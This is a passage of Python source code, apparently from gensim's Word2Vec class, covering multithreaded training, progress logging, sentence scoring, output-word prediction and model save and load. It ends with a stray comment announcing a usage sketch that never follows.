self, corpus_iterable=None, corpus_file=None, total_examples=None, total_words=None,
epochs=None, start_alpha=None, end_alpha=None, word_count=0,
queue_factor=2, report_delay=1.0, compute_loss=False, callbacks=(),
**kwargs,
):
"""Update the model's neural weights from a sequence of sentences.
Notes
-----
To support linear learning-rate decay from (initial) `alpha` to `min_alpha`, and accurate
progress-percentage logging, either `total_examples` (count of sentences) or `total_words` (count of
raw words in sentences) **MUST** be provided. If `sentences` is the same corpus
that was provided to :meth:`~gensim.models.word2vec.Word2Vec.build_vocab` earlier,
you can simply use `total_examples=self.corpus_count`.
Warnings
--------
To avoid common mistakes around the model's ability to do multiple training passes itself, an
explicit `epochs` argument **MUST** be provided. In the common and recommended case
where :meth:`~gensim.models.word2vec.Word2Vec.train` is only called once, you can set `epochs=self.epochs`.
Parameters
----------
corpus_iterable : iterable of list of str
The ``corpus_iterable`` can be simply a list of lists of tokens, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network, to limit RAM usage.
See :class:`~gensim.models.word2vec.BrownCorpus`, :class:`~gensim.models.word2vec.Text8Corpus`
or :class:`~gensim.models.word2vec.LineSentence` in :mod:`~gensim.models.word2vec` module for such examples.
See also the `tutorial on data streaming in Python
<https://rare-technologies.com/data-streaming-in-python-generators-iterators-iterables/>`_.
corpus_file : str, optional
Path to a corpus file in :class:`~gensim.models.word2vec.LineSentence` format.
You may use this argument instead of `sentences` to get a performance boost. Only one of the `sentences` or
`corpus_file` arguments needs to be passed (not both of them).
total_examples : int
Count of sentences.
total_words : int
Count of raw words in sentences.
epochs : int
Number of iterations (epochs) over the corpus.
start_alpha : float, optional
Initial learning rate. If supplied, replaces the starting `alpha` from the constructor,
for this one call to `train()`.
Use only if making multiple calls to `train()`, when you want to manage the alpha learning-rate yourself
(not recommended).
end_alpha : float, optional
Final learning rate. Drops linearly from `start_alpha`.
If supplied, this replaces the final `min_alpha` from the constructor, for this one call to `train()`.
Use only if making multiple calls to `train()`, when you want to manage the alpha learning-rate yourself
(not recommended).
word_count : int, optional
Count of words already trained. Set this to 0 for the usual
case of training on all words in sentences.
queue_factor : int, optional
Multiplier for size of queue (number of workers * queue_factor).
report_delay : float, optional
Seconds to wait before reporting progress.
compute_loss: bool, optional
If True, computes and stores loss value which can be retrieved using
:meth:`~gensim.models.word2vec.Word2Vec.get_latest_training_loss`.
callbacks : iterable of :class:`~gensim.models.callbacks.CallbackAny2Vec`, optional
Sequence of callbacks to be executed at specific stages during training.
Examples
--------
.. sourcecode:: pycon
>>> from gensim.models import Word2Vec
>>> sentences = [["cat", "say", "meow"], ["dog", "say", "woof"]]
>>>
>>> model = Word2Vec(min_count=1)
>>> model.build_vocab(sentences) # prepare the model vocabulary
>>> model.train(sentences, total_examples=model.corpus_count, epochs=model.epochs) # train word vectors
(1, 30)
"""
self.alpha = start_alpha or self.alpha
self.min_alpha = end_alpha or self.min_alpha
self.epochs = epochs
self._check_training_sanity(epochs=epochs, total_examples=total_examples, total_words=total_words)
self._check_corpus_sanity(corpus_iterable=corpus_iterable, corpus_file=corpus_file, passes=epochs)
self.add_lifecycle_event(
"train",
msg=(
f"training model with {self.workers} workers on {len(self.wv)} vocabulary and "
f"{self.layer1_size} features, using sg={self.sg} hs={self.hs} sample={self.sample} "
f"negative={self.negative} window={self.window}"
),
)
self.compute_loss = compute_loss
self.running_training_loss = 0.0
for callback in callbacks:
callback.on_train_begin(self)
trained_word_count = 0
raw_word_count = 0
start = default_timer() - 0.00001
job_tally = 0
for cur_epoch in range(self.epochs):
for callback in callbacks:
callback.on_epoch_begin(self)
if corpus_iterable is not None:
trained_word_count_epoch, raw_word_count_epoch, job_tally_epoch = self._train_epoch(
corpus_iterable, cur_epoch=cur_epoch, total_examples=total_examples,
total_words=total_words, queue_factor=queue_factor, report_delay=report_delay,
callbacks=callbacks, **kwargs)
else:
trained_word_count_epoch, raw_word_count_epoch, job_tally_epoch = self._train_epoch_corpusfile(
corpus_file, cur_epoch=cur_epoch, total_examples=total_examples, total_words=total_words,
callbacks=callbacks, **kwargs)
trained_word_count += trained_word_count_epoch
raw_word_count += raw_word_count_epoch
job_tally += job_tally_epoch
for callback in callbacks:
callback.on_epoch_end(self)
# Log overall time
total_elapsed = default_timer() - start
self._log_train_end(raw_word_count, trained_word_count, total_elapsed, job_tally)
self.train_count += 1 # number of times train() has been called
self._clear_post_train()
for callback in callbacks:
callback.on_train_end(self)
return trained_word_count, raw_word_count
def _worker_loop_corpusfile(
self, corpus_file, thread_id, offset, cython_vocab, progress_queue, cur_epoch=0,
total_examples=None, total_words=None, **kwargs,
):
"""Train the model on a `corpus_file` in LineSentence format.
This function will be called in parallel by multiple workers (threads or processes) to make
optimal use of multicore machines.
Parameters
----------
corpus_file : str
Path to a corpus file in :class:`~gensim.models.word2vec.LineSentence` format.
thread_id : int
Thread index starting from 0 to `number of workers - 1`.
offset : int
Offset (in bytes) in the `corpus_file` for particular worker.
cython_vocab : :class:`~gensim.models.word2vec_inner.CythonVocab`
Copy of the vocabulary in order to access it without GIL.
progress_queue : Queue of (int, int, int)
A queue of progress reports. Each report is represented as a tuple of these 3 elements:
* Size of data chunk processed, for example number of sentences in the corpus chunk.
* Effective word count used in training (after ignoring unknown words and trimming the sentence length).
* Total word count used in training.
**kwargs : object
Additional key word parameters for the specific model inheriting from this class.
"""
thread_private_mem = self._get_thread_working_mem()
examples, tally, raw_tally = self._do_train_epoch(
corpus_file, thread_id, offset, cython_vocab, thread_private_mem, cur_epoch,
total_examples=total_examples, total_words=total_words, **kwargs)
progress_queue.put((examples, tally, raw_tally))
progress_queue.put(None)
def _worker_loop(self, job_queue, progress_queue):
"""Train the model, lifting batches of data from the queue.
This function will be called in parallel by multiple workers (threads or processes) to make
optimal use of multicore machines.
Parameters
----------
job_queue : Queue of (list of objects, float)
A queue of jobs still to be processed. The worker will take up jobs from this queue.
Each job is represented by a tuple where the first element is the corpus chunk to be processed and
the second is the floating-point learning rate.
progress_queue : Queue of (int, int, int)
A queue of progress reports. Each report is represented as a tuple of these 3 elements:
* Size of data chunk processed, for example number of sentences in the corpus chunk.
* Effective word count used in training (after ignoring unknown words and trimming the sentence length).
* Total word count used in training.
"""
thread_private_mem = self._get_thread_working_mem()
jobs_processed = 0
while True:
job = job_queue.get()
if job is None:
progress_queue.put(None)
break # no more jobs => quit this worker
data_iterable, alpha = job
tally, raw_tally = self._do_train_job(data_iterable, alpha, thread_private_mem)
progress_queue.put((len(data_iterable), tally, raw_tally)) # report back progress
jobs_processed += 1
logger.debug("worker exiting, processed %i jobs", jobs_processed)
def _job_producer(self, data_iterator, job_queue, cur_epoch=0, total_examples=None, total_words=None):
"""Fill the jobs queue using the data found in the input stream.
Each job is represented by a tuple where the first element is the corpus chunk to be processed and
the second is the learning rate to be used for that chunk.
Parameters
----------
data_iterator : iterable of list of objects
The input dataset. This will be split in chunks and these chunks will be pushed to the queue.
job_queue : Queue of (list of object, float)
A queue of jobs still to be processed. The worker will take up jobs from this queue.
Each job is represented by a tuple where the first element is the corpus chunk to be processed and
the second is the floating-point learning rate.
cur_epoch : int, optional
The current training epoch, needed to compute the training parameters for each job.
For example in many implementations the learning rate would be dropping with the number of epochs.
total_examples : int, optional
Count of objects in the `data_iterator`. In the usual case this would correspond to the number of sentences
in a corpus. Used to log progress.
total_words : int, optional
Count of total objects in `data_iterator`. In the usual case this would correspond to the number of raw
words in a corpus. Used to log progress.
"""
job_batch, batch_size = [], 0
pushed_words, pushed_examples = 0, 0
next_alpha = self._get_next_alpha(0.0, cur_epoch)
job_no = 0
for data_idx, data in enumerate(data_iterator):
data_length = self._raw_word_count([data])
# can we fit this sentence into the existing job batch?
if batch_size + data_length <= self.batch_words:
# yes => add it to the current job
job_batch.append(data)
batch_size += data_length
else:
job_no += 1
job_queue.put((job_batch, next_alpha))
# update the learning rate for the next job
if total_examples:
# examples-based decay
pushed_examples += len(job_batch)
epoch_progress = 1.0 * pushed_examples / total_examples
else:
# words-based decay
pushed_words += self._raw_word_count(job_batch)
epoch_progress = 1.0 * pushed_words / total_words
next_alpha = self._get_next_alpha(epoch_progress, cur_epoch)
# add the sentence that didn't fit as the first item of a new job
job_batch, batch_size = [data], data_length
# add the last job too (may be significantly smaller than batch_words)
if job_batch:
job_no += 1
job_queue.put((job_batch, next_alpha))
if job_no == 0 and self.train_count == 0:
logger.warning(
"train() called with an empty iterator (if not intended, "
"be sure to provide a corpus that offers restartable iteration = an iterable)."
)
# give the workers heads up that they can finish -- no more work!
for _ in range(self.workers):
job_queue.put(None)
logger.debug("job loop exiting, total %i jobs", job_no)
def _log_epoch_progress(
self, progress_queue=None, job_queue=None, cur_epoch=0, total_examples=None,
total_words=None, report_delay=1.0, is_corpus_file_mode=None,
):
"""Get the progress report for a single training epoch.
Parameters
----------
progress_queue : Queue of (int, int, int)
A queue of progress reports. Each report is represented as a tuple of these 3 elements:
* size of data chunk processed, for example number of sentences in the corpus chunk.
* Effective word count used in training (after ignoring unknown words and trimming the sentence length).
* Total word count used in training.
job_queue : Queue of (list of object, float)
A queue of jobs still to be processed. The worker will take up jobs from this queue.
Each job is represented by a tuple where the first element is the corpus chunk to be processed and
the second is the floating-point learning rate.
cur_epoch : int, optional
The current training epoch, needed to compute the training parameters for each job.
For example in many implementations the learning rate would be dropping with the number of epochs.
total_examples : int, optional
Count of objects in the `data_iterator`. In the usual case this would correspond to the number of sentences
in a corpus. Used to log progress.
total_words : int, optional
Count of total objects in `data_iterator`. In the usual case this would correspond to the number of raw
words in a corpus. Used to log progress.
report_delay : float, optional
Number of seconds between two consecutive progress report messages in the logger.
is_corpus_file_mode : bool, optional
Whether training is file-based (corpus_file argument) or not.
Returns
-------
(int, int, int)
The epoch report consisting of three elements:
* size of data chunk processed, for example number of sentences in the corpus chunk.
* Effective word count used in training (after ignoring unknown words and trimming the sentence length).
* Total word count used in training.
"""
example_count, trained_word_count, raw_word_count = 0, 0, 0
start, next_report = default_timer() - 0.00001, 1.0
job_tally = 0
unfinished_worker_count = self.workers
while unfinished_worker_count > 0:
report = progress_queue.get() # blocks if workers too slow
if report is None: # a thread reporting that it finished
unfinished_worker_count -= 1
logger.info("worker thread finished; awaiting finish of %i more threads", unfinished_worker_count)
continue
examples, trained_words, raw_words = report
job_tally += 1
# update progress stats
example_count += examples
trained_word_count += trained_words # only words in vocab & sampled
raw_word_count += raw_words
# log progress once every report_delay seconds
elapsed = default_timer() - start
if elapsed >= next_report:
self._log_progress(
job_queue, progress_queue, cur_epoch, example_count, total_examples,
raw_word_count, total_words, trained_word_count, elapsed)
next_report = elapsed + report_delay
# all done; report the final stats
elapsed = default_timer() - start
self._log_epoch_end(
cur_epoch, example_count, total_examples, raw_word_count, total_words,
trained_word_count, elapsed, is_corpus_file_mode)
self.total_train_time += elapsed
return trained_word_count, raw_word_count, job_tally
def _train_epoch_corpusfile(
self, corpus_file, cur_epoch=0, total_examples=None, total_words=None, callbacks=(), **kwargs,
):
"""Train the model for a single epoch.
Parameters
----------
corpus_file : str
Path to a corpus file in :class:`~gensim.models.word2vec.LineSentence` format.
cur_epoch : int, optional
The current training epoch, needed to compute the training parameters for each job.
For example in many implementations the learning rate would be dropping with the number of epochs.
total_examples : int, optional
Count of objects in the `data_iterator`. In the usual case this would correspond to the number of sentences
in a corpus, used to log progress.
total_words : int
Count of total objects in `data_iterator`. In the usual case this would correspond to the number of raw
words in a corpus, used to log progress. Must be provided in order to seek in `corpus_file`.
**kwargs : object
Additional key word parameters for the specific model inheriting from this class.
Returns
-------
(int, int, int)
The training report for this epoch consisting of three elements:
* Size of data chunk processed, for example number of sentences in the corpus chunk.
* Effective word count used in training (after ignoring unknown words and trimming the sentence length).
* Total word count used in training.
"""
if not total_words:
raise ValueError("total_words must be provided alongside corpus_file argument.")
from gensim.models.word2vec_corpusfile import CythonVocab
from gensim.models.fasttext import FastText
cython_vocab = CythonVocab(self.wv, hs=self.hs, fasttext=isinstance(self, FastText))
progress_queue = Queue()
corpus_file_size = os.path.getsize(corpus_file)
thread_kwargs = copy.copy(kwargs)
thread_kwargs['cur_epoch'] = cur_epoch
thread_kwargs['total_examples'] = total_examples
thread_kwargs['total_words'] = total_words
workers = [
threading.Thread(
target=self._worker_loop_corpusfile,
args=(
corpus_file, thread_id, corpus_file_size / self.workers * thread_id, cython_vocab, progress_queue
),
kwargs=thread_kwargs
) for thread_id in range(self.workers)
]
for thread in workers:
thread.daemon = True
thread.start()
trained_word_count, raw_word_count, job_tally = self._log_epoch_progress(
progress_queue=progress_queue, job_queue=None, cur_epoch=cur_epoch,
total_examples=total_examples, total_words=total_words, is_corpus_file_mode=True)
return trained_word_count, raw_word_count, job_tally
def _train_epoch(
self, data_iterable, cur_epoch=0, total_examples=None, total_words=None,
queue_factor=2, report_delay=1.0, callbacks=(),
):
"""Train the model for a single epoch.
Parameters
----------
data_iterable : iterable of list of object
The input corpus. This will be split in chunks and these chunks will be pushed to the queue.
cur_epoch : int, optional
The current training epoch, needed to compute the training parameters for each job.
For example in many implementations the learning rate would be dropping with the number of epochs.
total_examples : int, optional
Count of objects in the `data_iterator`. In the usual case this would correspond to the number of sentences
in a corpus, used to log progress.
total_words : int, optional
Count of total objects in `data_iterator`. In the usual case this would correspond to the number of raw
words in a corpus, used to log progress.
queue_factor : int, optional
Multiplier for size of queue -> size = number of workers * queue_factor.
report_delay : float, optional
Number of seconds between two consecutive progress report messages in the logger.
Returns
-------
(int, int, int)
The training report for this epoch consisting of three elements:
* Size of data chunk processed, for example number of sentences in the corpus chunk.
* Effective word count used in training (after ignoring unknown words and trimming the sentence length).
* Total word count used in training.
"""
job_queue = Queue(maxsize=queue_factor * self.workers)
progress_queue = Queue(maxsize=(queue_factor + 1) * self.workers)
workers = [
threading.Thread(
target=self._worker_loop,
args=(job_queue, progress_queue,))
for _ in range(self.workers)
]
workers.append(threading.Thread(
target=self._job_producer,
args=(data_iterable, job_queue),
kwargs={'cur_epoch': cur_epoch, 'total_examples': total_examples, 'total_words': total_words}))
for thread in workers:
thread.daemon = True # make interrupting the process with ctrl+c easier
thread.start()
trained_word_count, raw_word_count, job_tally = self._log_epoch_progress(
progress_queue, job_queue, cur_epoch=cur_epoch, total_examples=total_examples,
total_words=total_words, report_delay=report_delay, is_corpus_file_mode=False,
)
return trained_word_count, raw_word_count, job_tally
def _get_next_alpha(self, epoch_progress, cur_epoch):
"""Get the correct learning rate for the next iteration.
Parameters
----------
epoch_progress : float
Ratio of finished work in the current epoch.
cur_epoch : int
Number of current iteration.
Returns
-------
float
The learning rate to be used in the next training epoch.
"""
start_alpha = self.alpha
end_alpha = self.min_alpha
progress = (cur_epoch + epoch_progress) / self.epochs
next_alpha = start_alpha - (start_alpha - end_alpha) * progress
next_alpha = max(end_alpha, next_alpha)
self.min_alpha_yet_reached = next_alpha
return next_alpha
def _get_thread_working_mem(self):
"""Computes the memory used per worker thread.
Returns
-------
(np.ndarray, np.ndarray)
Each worker thread's private work memory.
"""
work = matutils.zeros_aligned(self.layer1_size, dtype=REAL) # per-thread private work memory
neu1 = matutils.zeros_aligned(self.layer1_size, dtype=REAL)
return work, neu1
def _raw_word_count(self, job):
"""Get the number of words in a given job.
Parameters
----------
job: iterable of list of str
The corpus chunk processed in a single batch.
Returns
-------
int
Number of raw words in the corpus chunk.
"""
return sum(len(sentence) for sentence in job)
def _check_corpus_sanity(self, corpus_iterable=None, corpus_file=None, passes=1):
"""Checks whether the corpus parameters make sense."""
if corpus_file is None and corpus_iterable is None:
raise TypeError("Either one of corpus_file or corpus_iterable value must be provided")
if corpus_file is not None and corpus_iterable is not None:
raise TypeError("Both corpus_file and corpus_iterable must not be provided at the same time")
if corpus_iterable is None and not os.path.isfile(corpus_file):
raise TypeError("Parameter corpus_file must be a valid path to a file, got %r instead" % corpus_file)
if corpus_iterable is not None and not isinstance(corpus_iterable, Iterable):
raise TypeError(
"The corpus_iterable must be an iterable of lists of strings, got %r instead" % corpus_iterable)
if corpus_iterable is not None and isinstance(corpus_iterable, GeneratorType) and passes > 1:
raise TypeError(
f"Using a generator as corpus_iterable can't support {passes} passes. Try a re-iterable sequence.")
def _check_training_sanity(self, epochs=0, total_examples=None, total_words=None, **kwargs):
"""Checks whether the training parameters make sense.
Parameters
----------
epochs : int
Number of training epochs. A positive integer.
total_examples : int, optional
Number of documents in the corpus. Either `total_examples` or `total_words` **must** be supplied.
total_words : int, optional
Number of words in the corpus. Either `total_examples` or `total_words` **must** be supplied.
**kwargs : object
Unused. Present to preserve signature among base and inherited implementations.
Raises
------
RuntimeError
If one of the required training pre/post processing steps has not been performed.
ValueError
If the combination of input parameters is inconsistent.
"""
if self.alpha > self.min_alpha_yet_reached:
logger.warning("Effective 'alpha' higher than previous training cycles")
if not self.wv.key_to_index: # should be set by `build_vocab`
raise RuntimeError("you must first build vocabulary before training the model")
if not len(self.wv.vectors):
raise RuntimeError("you must initialize vectors before training the model")
if total_words is None and total_examples is None:
raise ValueError(
"You must specify either total_examples or total_words, for proper learning-rate "
"and progress calculations. "
"If you've just built the vocabulary using the same corpus, using the count cached "
"in the model is sufficient: total_examples=model.corpus_count."
)
if epochs is None or epochs <= 0:
raise ValueError("You must specify an explicit epochs count. The usual value is epochs=model.epochs.")
def _log_progress(
self, job_queue, progress_queue, cur_epoch, example_count, total_examples,
raw_word_count, total_words, trained_word_count, elapsed
):
"""Callback used to log progress for long running jobs.
Parameters
----------
job_queue : Queue of (list of object, float)
The queue of jobs still to be performed by workers. Each job is represented as a tuple containing
the batch of data to be processed and the floating-point learning rate.
progress_queue : Queue of (int, int, int)
A queue of progress reports. Each report is represented as a tuple of these 3 elements:
* size of data chunk processed, for example number of sentences in the corpus chunk.
* Effective word count used in training (after ignoring unknown words and trimming the sentence length).
* Total word count used in training.
cur_epoch : int
The current training iteration through the corpus.
example_count : int
Number of examples (could be sentences for example) processed until now.
total_examples : int
Number of all examples present in the input corpus.
raw_word_count : int
Number of words used in training until now.
total_words : int
Number of all words in the input corpus.
trained_word_count : int
Number of effective words used in training until now (after ignoring unknown words and trimming
the sentence length).
elapsed : int
Elapsed time since the beginning of training in seconds.
Notes
-----
If you train the model via `corpus_file` argument, there is no job_queue, so reported job_queue size will
always be equal to -1.
"""
if total_examples:
# examples-based progress %
logger.info(
"EPOCH %i - PROGRESS: at %.2f%% examples, %.0f words/s, in_qsize %i, out_qsize %i",
cur_epoch + 1, 100.0 * example_count / total_examples, trained_word_count / elapsed,
-1 if job_queue is None else utils.qsize(job_queue), utils.qsize(progress_queue)
)
else:
# words-based progress %
logger.info(
"EPOCH %i - PROGRESS: at %.2f%% words, %.0f words/s, in_qsize %i, out_qsize %i",
cur_epoch + 1, 100.0 * raw_word_count / total_words, trained_word_count / elapsed,
-1 if job_queue is None else utils.qsize(job_queue), utils.qsize(progress_queue)
)
def _log_epoch_end(
self, cur_epoch, example_count, total_examples, raw_word_count, total_words,
trained_word_count, elapsed, is_corpus_file_mode
):
"""Callback used to log the end of a training epoch.
Parameters
----------
cur_epoch : int
The current training iteration through the corpus.
example_count : int
Number of examples (could be sentences for example) processed until now.
total_examples : int
Number of all examples present in the input corpus.
raw_word_count : int
Number of words used in training until now.
total_words : int
Number of all words in the input corpus.
trained_word_count : int
Number of effective words used in training until now (after ignoring unknown words and trimming
the sentence length).
elapsed : int
Elapsed time since the beginning of training in seconds.
is_corpus_file_mode : bool
Whether training is file-based (corpus_file argument) or not.
Warnings
--------
        Logs a warning if the supplied corpus appears to have changed while the epoch was running (the observed example or word counts differ from the expected totals).
"""
logger.info(
"EPOCH - %i : training on %i raw words (%i effective words) took %.1fs, %.0f effective words/s",
cur_epoch + 1, raw_word_count, trained_word_count, elapsed, trained_word_count / elapsed,
)
# don't warn if training in file-based mode, because it's expected behavior
if is_corpus_file_mode:
return
# check that the input corpus hasn't changed during iteration
if total_examples and total_examples != example_count:
logger.warning(
"EPOCH - %i : supplied example count (%i) did not equal expected count (%i)", cur_epoch + 1,
example_count, total_examples
)
if total_words and total_words != raw_word_count:
logger.warning(
"EPOCH - %i : supplied raw word count (%i) did not equal expected count (%i)", cur_epoch + 1,
raw_word_count, total_words
)
def _log_train_end(self, raw_word_count, trained_word_count, total_elapsed, job_tally):
"""Callback to log the end of training.
Parameters
----------
raw_word_count : int
Number of words used in the whole training.
trained_word_count : int
Number of effective words used in training (after ignoring unknown words and trimming the sentence length).
total_elapsed : int
Total time spent during training in seconds.
job_tally : int
Total number of jobs processed during training.
"""
self.add_lifecycle_event("train", msg=(
f"training on {raw_word_count} raw words ({trained_word_count} effective words) "
f"took {total_elapsed:.1f}s, {trained_word_count / total_elapsed:.0f} effective words/s"
))
def score(self, sentences, total_sentences=int(1e6), chunksize=100, queue_factor=2, report_delay=1):
"""Score the log probability for a sequence of sentences.
This does not change the fitted model in any way (see :meth:`~gensim.models.word2vec.Word2Vec.train` for that).
Gensim has currently only implemented score for the hierarchical softmax scheme,
so you need to have run word2vec with `hs=1` and `negative=0` for this to work.
        Note that you should specify `total_sentences`: scoring stops once that many sentences have been
        processed and the result buffer is allocated for exactly that many, so setting the value far
        higher than needed wastes memory.
See the `article by Matt Taddy: "Document Classification by Inversion of Distributed Language Representations"
<https://arxiv.org/pdf/1504.07295.pdf>`_ and the
`gensim demo <https://github.com/piskvorky/gensim/blob/develop/docs/notebooks/deepir.ipynb>`_ for examples of
how to use such scores in document classification.
Parameters
----------
sentences : iterable of list of str
The `sentences` iterable can be simply a list of lists of tokens, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network.
See :class:`~gensim.models.word2vec.BrownCorpus`, :class:`~gensim.models.word2vec.Text8Corpus`
or :class:`~gensim.models.word2vec.LineSentence` in :mod:`~gensim.models.word2vec` module for such examples.
total_sentences : int, optional
            Maximum number of sentences to score (also used to size the result array).
        chunksize : int, optional
            Number of sentences handed to each worker job.
queue_factor : int, optional
Multiplier for size of queue (number of workers * queue_factor).
report_delay : float, optional
Seconds to wait before reporting progress.
"""
logger.info(
"scoring sentences with %i workers on %i vocabulary and %i features, "
"using sg=%s hs=%s sample=%s and negative=%s",
self.workers, len(self.wv), self.layer1_size, self.sg, self.hs,
self.sample, self.negative
)
if not self.wv.key_to_index:
raise RuntimeError("you must first build vocabulary before scoring new data")
if not self.hs:
raise RuntimeError(
"We have currently only implemented score for the hierarchical softmax scheme, "
"so you need to have run word2vec with hs=1 and negative=0 for this to work."
)
def worker_loop():
"""Compute log probability for each sentence, lifting lists of sentences from the jobs queue."""
work = np.zeros(1, dtype=REAL) # for sg hs, we actually only need one memory loc (running sum)
neu1 = matutils.zeros_aligned(self.layer1_size, dtype=REAL)
while True:
job = job_queue.get()
if job is None: # signal to finish
break
ns = 0
for sentence_id, sentence in job:
if sentence_id >= total_sentences:
break
if self.sg:
score = score_sentence_sg(self, sentence, work)
else:
score = score_sentence_cbow(self, sentence, work, neu1)
sentence_scores[sentence_id] = score
ns += 1
progress_queue.put(ns) # report progress
start, next_report = default_timer(), 1.0
# buffer ahead only a limited number of jobs.. this is the reason we can't simply use ThreadPool :(
job_queue = Queue(maxsize=queue_factor * self.workers)
progress_queue = Queue(maxsize=(queue_factor + 1) * self.workers)
workers = [threading.Thread(target=worker_loop) for _ in range(self.workers)]
for thread in workers:
thread.daemon = True # make interrupting the process with ctrl+c easier
thread.start()
sentence_count = 0
sentence_scores = matutils.zeros_aligned(total_sentences, dtype=REAL)
push_done = False
done_jobs = 0
jobs_source = enumerate(utils.grouper(enumerate(sentences), chunksize))
# fill jobs queue with (id, sentence) job items
while True:
try:
job_no, items = next(jobs_source)
if (job_no - 1) * chunksize > total_sentences:
logger.warning(
"terminating after %i sentences (set higher total_sentences if you want more).",
total_sentences
)
job_no -= 1
raise StopIteration()
logger.debug("putting job #%i in the queue", job_no)
job_queue.put(items)
except StopIteration:
logger.info("reached end of input; waiting to finish %i outstanding jobs", job_no - done_jobs + 1)
for _ in range(self.workers):
job_queue.put(None) # give the workers heads up that they can finish -- no more work!
push_done = True
try:
while done_jobs < (job_no + 1) or not push_done:
ns = progress_queue.get(push_done) # only block after all jobs pushed
sentence_count += ns
done_jobs += 1
elapsed = default_timer() - start
if elapsed >= next_report:
logger.info(
"PROGRESS: at %.2f%% sentences, %.0f sentences/s",
                            100.0 * sentence_count / total_sentences, sentence_count / elapsed
)
next_report = elapsed + report_delay # don't flood log, wait report_delay seconds
else:
# loop ended by job count; really done
break
except Empty:
pass # already out of loop; continue to next push
elapsed = default_timer() - start
self.wv.norms = None # clear any cached lengths
logger.info(
"scoring %i sentences took %.1fs, %.0f sentences/s",
sentence_count, elapsed, sentence_count / elapsed
)
return sentence_scores[:sentence_count]
def predict_output_word(self, context_words_list, topn=10):
"""Get the probability distribution of the center word given context words.
Note this performs a CBOW-style propagation, even in SG models,
and doesn't quite weight the surrounding words the same as in
training -- so it's just one crude way of using a trained model
as a predictor.
Parameters
----------
context_words_list : list of str
List of context words.
topn : int, optional
Return `topn` words and their probabilities.
Returns
-------
list of (str, float)
`topn` length list of tuples of (word, probability).
"""
if not self.negative:
raise RuntimeError(
"We have currently only implemented predict_output_word for the negative sampling scheme, "
"so you need to have run word2vec with negative > 0 for this to work."
)
if not hasattr(self.wv, 'vectors') or not hasattr(self, 'syn1neg'):
raise RuntimeError("Parameters required for predicting the output words not found.")
word2_indices = [self.wv.get_index(w) for w in context_words_list if w in self.wv]
if not word2_indices:
logger.warning("All the input context words are out-of-vocabulary for the current model.")
return None
l1 = np.sum(self.wv.vectors[word2_indices], axis=0)
if word2_indices and self.cbow_mean:
l1 /= len(word2_indices)
# propagate hidden -> output and take softmax to get probabilities
prob_values = np.exp(np.dot(l1, self.syn1neg.T))
prob_values /= sum(prob_values)
top_indices = matutils.argsort(prob_values, topn=topn, reverse=True)
# returning the most probable output words with their probabilities
return [(self.wv.index_to_key[index1], prob_values[index1]) for index1 in top_indices]
def reset_from(self, other_model):
"""Borrow shareable pre-built structures from `other_model` and reset hidden layer weights.
Structures copied are:
* Vocabulary
* Index to word mapping
* Cumulative frequency table (used for negative sampling)
* Cached corpus length
Useful when testing multiple models on the same corpus in parallel. However, as the models
then share all vocabulary-related structures other than vectors, neither should then
expand their vocabulary (which could leave the other in an inconsistent, broken state).
And, any changes to any per-word 'vecattr' will affect both models.
Parameters
----------
other_model : :class:`~gensim.models.word2vec.Word2Vec`
Another model to copy the internal structures from.
"""
self.wv = KeyedVectors(self.vector_size)
self.wv.index_to_key = other_model.wv.index_to_key
self.wv.key_to_index = other_model.wv.key_to_index
self.wv.expandos = other_model.wv.expandos
self.cum_table = other_model.cum_table
self.corpus_count = other_model.corpus_count
self.init_weights()
def __str__(self):
"""Human readable representation of the model's state.
Returns
-------
str
Human readable representation of the model's state, including the vocabulary size, vector size
and learning rate.
"""
return "%s(vocab=%s, vector_size=%s, alpha=%s)" % (
self.__class__.__name__, len(self.wv.index_to_key), self.wv.vector_size, self.alpha,
)
def save(self, *args, **kwargs):
"""Save the model.
This saved model can be loaded again using :func:`~gensim.models.word2vec.Word2Vec.load`, which supports
online training and getting vectors for vocabulary words.
Parameters
----------
fname : str
Path to the file.
"""
super(Word2Vec, self).save(*args, **kwargs)
def _save_specials(self, fname, separately, sep_limit, ignore, pickle_protocol, compress, subname):
"""Arrange any special handling for the `gensim.utils.SaveLoad` protocol."""
# don't save properties that are merely calculated from others
ignore = set(ignore).union(['cum_table', ])
return super(Word2Vec, self)._save_specials(
fname, separately, sep_limit, ignore, pickle_protocol, compress, subname)
@classmethod
def load(cls, *args, rethrow=False, **kwargs):
"""Load a previously saved :class:`~gensim.models.word2vec.Word2Vec` model.
See Also
--------
:meth:`~gensim.models.word2vec.Word2Vec.save`
Save model.
Parameters
----------
fname : str
Path to the saved file.
Returns
-------
:class:`~gensim.models.word2vec.Word2Vec`
Loaded model.
"""
try:
model = super(Word2Vec, cls).load(*args, **kwargs)
if not isinstance(model, Word2Vec):
rethrow = True
raise AttributeError("Model of type %s can't be loaded by %s" % (type(model), str(cls)))
return model
except AttributeError as ae:
if rethrow:
raise ae
logger.error(
"Model load error. Was model saved using code from an older Gensim Version? "
"Try loading older model using gensim-3.8.3, then re-saving, to restore "
"compatibility with current code.")
raise ae
def _load_specials(self, *args, **kwargs):
"""Handle special requirements of `.load()` protocol, usually up-converting older versions."""
super(Word2Vec, self)._load_specials(*args, **kwargs)
# for backward compatibility, add/rearrange properties from prior versions
if not hasattr(self, 'ns_exponent'):
self.ns_exponent = 0.75
if self.negative and hasattr(self.wv, 'index_to_key'):
self.make_cum_table() # rebuild cum_table from vocabulary
if not hasattr(self, 'corpus_count'):
self.corpus_count = None
if not hasattr(self, 'corpus_total_words'):
self.corpus_total_words = None
if not hasattr(self.wv, 'vectors_lockf') and hasattr(self.wv, 'vectors'):
self.wv.vectors_lockf = np.ones(1, dtype=REAL)
if not hasattr(self, 'random'):
# use new instance of numpy's recommended generator/algorithm
self.random = np.random.default_rng(seed=self.seed)
if not hasattr(self, 'train_count'):
self.train_count = 0
self.total_train_time = 0
if not hasattr(self, 'epochs'):
self.epochs = self.iter
del self.iter
if not hasattr(self, 'max_final_vocab'):
self.max_final_vocab = None
if hasattr(self, 'vocabulary'): # re-integrate state that had been moved
for a in ('max_vocab_size', 'min_count', 'sample', 'sorted_vocab', 'null_word', 'raw_vocab'):
setattr(self, a, getattr(self.vocabulary, a))
del self.vocabulary
if hasattr(self, 'trainables'): # re-integrate state that had been moved
for a in ('hashfxn', 'layer1_size', 'seed', 'syn1neg', 'syn1'):
if hasattr(self.trainables, a):
setattr(self, a, getattr(self.trainables, a))
del self.trainables
def get_latest_training_loss(self):
"""Get current value of the training loss.
Returns
-------
float
Current training loss.
"""
return self.running_training_loss
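# --- Illustrative usage sketch (editor's addition, not part of gensim) ---
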